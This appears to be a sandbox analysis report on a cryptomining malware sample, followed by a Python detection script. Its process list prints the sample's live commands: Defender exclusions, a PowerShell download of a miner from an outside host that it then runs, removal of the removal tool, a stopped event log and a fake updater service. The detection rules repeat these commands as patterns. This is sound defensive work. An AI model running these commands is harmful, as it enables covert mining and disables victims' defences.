Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\dialer.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2020 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2020 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2020 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2020 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2020 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4556 wrote to memory of 764 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe
PID 4556 wrote to memory of 764 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe
PID 4556 wrote to memory of 764 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe
PID 1740 wrote to memory of 2932 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2932 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 2932 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4464 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4464 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1740 wrote to memory of 4464 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 2108 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 2108 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 2108 N/A C:\Windows\SysWOW64\DllHost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2108 wrote to memory of 4184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msdr.exe
PID 2108 wrote to memory of 4184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msdr.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 4184 wrote to memory of 2328 N/A C:\Windows\SysWOW64\msdr.exe C:\Windows\system32\dialer.exe
PID 2328 wrote to memory of 612 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\winlogon.exe
PID 2328 wrote to memory of 668 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsass.exe
PID 2328 wrote to memory of 964 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 380 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\dwm.exe
PID 2328 wrote to memory of 424 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1032 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1116 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1124 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1204 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1236 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 2328 wrote to memory of 1288 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1324 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1344 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 1904 wrote to memory of 5092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 1904 wrote to memory of 5092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 2328 wrote to memory of 1452 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1492 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1556 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1580 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1656 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1712 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1732 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1804 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1816 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 1932 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1984 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 2004 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 1440 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2328 wrote to memory of 2084 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\spoolsv.exe
PID 2328 wrote to memory of 2100 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2328 wrote to memory of 2184 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 668 wrote to memory of 2828 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe

"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Malware-gen.18534.23013.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe

"C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension 'exe' -ExclusionPath 'C:\Windows\System32\'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest "https://darkslain.com/release/miner.exe" -OutFile 'C:\Windows\System32\msdr.exe'

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & 'C:\Windows\System32\msdr.exe'

C:\Windows\SysWOW64\msdr.exe

"C:\Windows\System32\msdr.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart
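
Read as a sequence, the command lines above are the miner's setup procedure: exclude exe files and System32 from Defender, download the payload straight into System32, remove the Malicious Software Removal Tool (KB890830), zero every sleep and hibernate timeout so the host keeps mining, stop the EventLog service, and register a service named after Google's updater whose binary lives under ProgramData. The following Python is an added example (editor's code, not part of the report) that runs a small rule set over command lines in this format and scores a host by the distinct techniques seen. The sample input is a constructed subset of the command lines listed above; the rule names, regexes and weights are my own.

```python
import re

# Constructed sample input: command lines copied from the "Processes" section of this
# report, one per line (report text, not live telemetry).
COMMAND_LINES = r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension 'exe' -ExclusionPath 'C:\Windows\System32\'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest "https://darkslain.com/release/miner.exe" -OutFile 'C:\Windows\System32\msdr.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & 'C:\Windows\System32\msdr.exe'
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\Explorer.EXE
"""

# (tag, weight, pattern). Weights are the editor's assumption; tune to your environment.
RULES = [
    # Defender exclusions by path/extension/process: the first step of most miner loaders.
    ("defender_exclusion", 4,
     re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Extension|Process)", re.I)),
    # A download cmdlet writing its output under the Windows directory.
    ("download_into_windows_dir", 3,
     re.compile(r"(Invoke-WebRequest|\biwr\b|DownloadFile|Start-BitsTransfer).*-OutFile\s+['\"]?[A-Z]:\\Windows\\", re.I)),
    # KB890830 is the Malicious Software Removal Tool; uninstalling it is pure evasion.
    ("msrt_removed", 2,
     re.compile(r"\bwusa\b.*/uninstall\b.*/kb:890830\b", re.I)),
    # Sleep/hibernate timeouts set to 0 keep the CPU available to the miner.
    ("sleep_timeouts_zeroed", 1,
     re.compile(r"\bpowercfg(\.exe)?\b.*-(hibernate|standby|monitor|disk)-timeout-(ac|dc)\s+0\b", re.I)),
    # Stopping the EventLog service blinds host-based logging.
    ("eventlog_service_stopped", 4,
     re.compile(r"\bsc(\.exe)?\b.*\bstop\b.*\beventlog\b", re.I)),
    # A new service whose binary lives under ProgramData rather than Program Files/System32.
    ("service_binpath_in_programdata", 3,
     re.compile(r"\bsc(\.exe)?\b.*\bcreate\b.*binpath=\s*['\"]?[A-Z]:\\ProgramData\\", re.I)),
]


def classify(cmdline):
    """Tags of every rule that fires on one command line, in RULES order."""
    return [tag for tag, _w, rx in RULES if rx.search(cmdline)]


def scan(text):
    """Run all rules over each non-empty line; returns [(cmdline, tags)] for lines that fired."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if line:
            tags = classify(line)
            if tags:
                hits.append((line, tags))
    return hits


def score(text):
    """Sum each distinct tag's weight once, so four powercfg calls count the same as one."""
    fired = {t for _cmd, tags in scan(text) for t in tags}
    return sum(w for tag, w, _rx in RULES if tag in fired)


if __name__ == "__main__":
    for cmd, tags in scan(COMMAND_LINES):
        print(f"{', '.join(tags):32} {cmd[:90]}")
    print("score:", score(COMMAND_LINES))
```

Note that the process image for the first PowerShell instances is C:\Windows\SysWOW64\...\powershell.exe while the command line names System32: that is ordinary WoW64 file-system redirection of a 32-bit parent, not a spoofed path, so the rules above key on arguments rather than on the image path.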

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
SY 94.232.249.90:8848 N/A tcp
US 8.8.8.8:53 90.249.232.94.in-addr.arpa udp
US 8.8.8.8:53 97.90.14.23.in-addr.arpa udp
SY 94.232.249.90:8848 N/A tcp
US 8.8.8.8:53 www.darkslain.com udp
US 104.21.37.86:443 www.darkslain.com tcp
US 8.8.8.8:53 86.37.21.104.in-addr.arpa udp
US 8.8.8.8:53 darkslain.com udp
US 172.67.206.78:443 darkslain.com tcp
US 8.8.8.8:53 78.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 randomxmonero.auto.nicehash.com udp
US 34.149.22.228:443 randomxmonero.auto.nicehash.com tcp
MD 45.67.229.122:80 45.67.229.122 tcp
US 8.8.8.8:53 228.22.149.34.in-addr.arpa udp
US 8.8.8.8:53 122.229.67.45.in-addr.arpa udp
MD 45.67.229.122:80 45.67.229.122 tcp

Files

memory/2020-0-0x0000000000400000-0x00000000005CA000-memory.dmp

memory/2020-1-0x0000000000567000-0x0000000000572000-memory.dmp

memory/2020-2-0x0000000000400000-0x00000000005CA000-memory.dmp

memory/4556-3-0x0000000001290000-0x00000000012A2000-memory.dmp

memory/2020-4-0x0000000000400000-0x00000000005CA000-memory.dmp

memory/4556-5-0x000000007436E000-0x000000007436F000-memory.dmp

memory/4556-6-0x0000000074360000-0x0000000074B10000-memory.dmp

memory/4556-9-0x0000000006490000-0x000000000652C000-memory.dmp

memory/4556-10-0x0000000006AE0000-0x0000000007084000-memory.dmp

memory/4556-11-0x0000000006530000-0x0000000006596000-memory.dmp

memory/4556-12-0x0000000074360000-0x0000000074B10000-memory.dmp

memory/4556-13-0x0000000007B10000-0x0000000007B86000-memory.dmp

memory/4556-14-0x0000000006A80000-0x0000000006A8E000-memory.dmp

memory/4556-15-0x0000000007A90000-0x0000000007AAE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cgHCY7Jy.exe

MD5 093c50edbabb0dab0b39658a6ac83e2d
SHA1 fecfd0c6d525b8060868db0863b23147cd3e8317
